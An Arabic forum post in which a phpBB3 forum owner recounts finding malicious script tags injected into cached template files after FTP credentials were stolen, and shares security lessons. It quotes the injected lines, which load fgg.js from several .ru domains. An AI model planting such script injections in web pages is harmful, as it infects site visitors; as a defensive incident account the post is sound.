[الحل] يتم تحميل ملف جافا سكريبت عند فتح الموقع لكل مرة
بسم الله الرحمن الرحيم
احبائى اعضاء سوالف الكرام
بعد التحيه
اليوم واثاء تجولى بمنتداى وجدت باسفل المتصفح يتم تحميل سكريبت من موقع معين
فى بداية الامر شكيت انه يكون السبب ان جهازى مخترق مثلا فقمت باعادة تنصيب وندوز جديد مع تزيل اخر كاسبر وتنصيبه
كان السبب وراء ذلك هو ملف تروجان يقوم بارسال كلمات المرور الحفوظه لدى الجهاز الى شخص موجود بالصين والفلبين ايضا (نصيحة لا تحاول اختيار حفظ كلمة المرور) :deal:
حاولت فحص جهازى اكتر من مرة للتاكد من وجود اى فيروسات والحمد لله انتهيت من هذا الامر
قلت ربما يكون فايروسا عاديا فلم اعيرة اى اهتمام (الحمد لله لم اصاب بفيروسات منذ اكثر من عام ونصف)
وسبحان الله اثناء تصفحى للمنتدى وجدت انه يقوم بتحميل سكريبت
ماشاء الله ماشاء الله كل هالمواقع يتم تحميل السكريبتات منها لتقوم بالضرر لاعضائى (الحمد لله لم اطلق المنتدى بعد وكان تحت التجريب)كود PHP:<script src=http://www.gb53.ru/fgg.js></script>
<script src=http://www.kc43.ru/fgg.js></script>
<script src=http://www.iogp.ru/fgg.js></script>
<script src=http://www.gb53.ru/fgg.js></script>
<script src=http://www.kc43.ru/fgg.js></script>
<script src=http://www.kc43.ru/fgg.js></script>
<script src=http://www.kc43.ru/fgg.js></script>
<script src=http://www.gb53.ru/fgg.js></script>
<script src=http://www.iogp.ru/fgg.js></script>
<script src=http://www.kc43.ru/fgg.js></script>
<script src=http://www.gb53.ru/fgg.js></script>
<script src=http://www.5kc3.ru/fgg.js></script>
<script src=http://www.gb53.ru/fgg.js></script>
<script src=http://www.kc43.ru/fgg.js></script>
<script src=http://www.iogp.ru/fgg.js></script>
<script src=http://www.kc43.ru/fgg.js></script>
<script src=http://www.kr92.ru/fgg.js></script>
<script src=http://www.ncwc.ru/fgg.js></script>
<script src=http://www.nmr43.ru/fgg.js></script>
<script src=http://www.ncwc.ru/fgg.js></script>
<script src=http://www.nmr43.ru/fgg.js></script>
<script src=http://www.nmr43.ru/fgg.js>
</script><script src=http://www.nmr43.ru/fgg.js>
حاولت البحث مرارا وتكرارا اين يوجد بصفحات الموقع وحتى الداتا بيز فلم اجده:anger2:
قلت ياربى ليش هذا (حمدت الله اخيرا ربما لاستفاد من هذا الدرس)
قلت اروح لملف log بتاع الموقع اشوف من ياترى اللى دخل وانا غافل عنه
فوجدت اى بيهات من الصين والفلبين تم الدخول عبر ال FTP (طبعا FTP مايستخدم نظام SSL لحماية كلمات المرور )
اول شئ سويته انى غيرت كل الباس بتاع موقعى وايميلى كذا الFTP ورونى كيف راح يدخلوا تانى
لكن لازالت هناك مشكلة
يتم التحميل الاسكريبتات عند استعراض المنتدى
ويخبرنى الكاسبر بهيك
رحت مغير كل الاستايلات أو بمعنى أدق حذفتهم ثم اعادة الرفع
المشكلة هى هى وش راح اسوى
حينها تذكرت انه يتم حفظ الملفات فى مجلد ال cache (فى حالة فقدان ملف من الاستايل يتم التعويض عنه بها فى منتديات phpbb3)
قمت بفتح ملف ctpl_admin_install_footer.html.php وذلك بعد استعراضى لمصدر الصفحة بالموقع ووجدت انه بالفعل داخل موقعى
ياترى وجدت ايش بهالملف
الاسكريبت منسوخ لجميع الملفات (مع انى ماضريت حد من قبل وافهم بالفيروسات كويس خاصة ملفات التروجان لكن هذا التروجان جديد من نوعه)
رحت حاذف كل ملفات مجلد cache وعاد كل شئ على طبيعته
المستفاد من هذا الدرس [للتذكير] (وذكر فإن الذكرى تنفع المؤمنين)
1- عدم فتح اى ملف من على الانترنت بامتداد exe الا بعد عمل سكان له (طب كيف انت اتفيرست ؟ >> معلهش كنت قافله ساعتها (غلطة وندامان عليها))
2- تغيير كلمة المرور باستمرار وجعلها معقدة (احرف كبيرة وصغيرة ورموز)
3- استخدام اخر نسخة من مكافحى الفيروسات + عمل تحديث له يوميا (انص بكاسبر سكاى 2009 )
4- افحص ملف ال log لموقعك باستمرار حتى تتأكد من انه لايوجد شخص غيرك يدخل باستمرار
س: لماذا قمت بذكر القصه وتوجع دماغنا بها؟
ج: قرأت فى سوالف موضوع عن احد الاخوة فى الرابط التالى عن تحميل بعض الاسكريبتات مع تحميل صفحة البداية
http://www.swalif.net/softs/swalif12/softs234546/
فى حالة نقل الموضوع او اغلاقة نرجوا من سيادتكم الرد بالافادة عن السبب
ودمتم بالخير
رد مع اقتباس
